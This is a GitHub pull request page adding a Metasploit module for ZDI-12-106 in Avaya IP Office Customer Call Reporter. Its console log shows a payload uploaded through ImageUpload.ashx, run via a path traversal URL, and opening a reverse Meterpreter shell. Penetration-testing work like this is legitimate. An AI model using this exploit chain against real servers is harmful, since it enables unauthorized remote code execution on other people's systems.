Added module for ZDI-12-106 #874

jvazquez-r7 · 2012-10-08T18:06:26Z

Tested successfully on Avaya IP Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.

msf  exploit(avaya_ccr_imageupload_exec) > reload
[*] Reloading module...
msf  exploit(avaya_ccr_imageupload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.172.149:80 - Uploading 389892 bytes through /CCRWebClient/Wallboard/ImageUpload.ashx...
[+] 192.168.172.149:80 - Payload uploaded successfuly
[*] 192.168.172.149:80 - Payload stored on C:\\Program Files\\Avaya\\IPOCCR\\CCRWallboardMessageBroker\\Logo_0_ccc3065a-5fc8-4a99-aada-f2335e18143b.aspx
[*] 192.168.172.149:80 - Executing /ccrwebclient/wallboard/../../CCRWallboardMessageBroker//Logo_0_ccc3065a-5fc8-4a99-aada-f2335e18143b.aspx...
[*] Sending stage (752128 bytes) to 192.168.1.128
[*] Meterpreter session 15 opened (192.168.1.128:4444 -> 192.168.1.128:53490) at 2012-10-08 19:55:22 +0200
[+] 192.168.172.149:80 - C:\\Program Files\\Avaya\\IPOCCR\\CCRWallboardMessageBroker\\Logo_0_ccc3065a-5fc8-4a99-aada-f2335e18143b.aspx deleted

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.149 - Meterpreter session 15 closed.  Reason: User exit

Added module for ZDI-12-106

ef9d627

wchen-r7 merged commit ef9d627 into rapid7:master Oct 8, 2012

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Added module for ZDI-12-106 #874

Added module for ZDI-12-106 #874

jvazquez-r7 commented Oct 8, 2012

Added module for ZDI-12-106 #874

Added module for ZDI-12-106 #874

Conversation

jvazquez-r7 commented Oct 8, 2012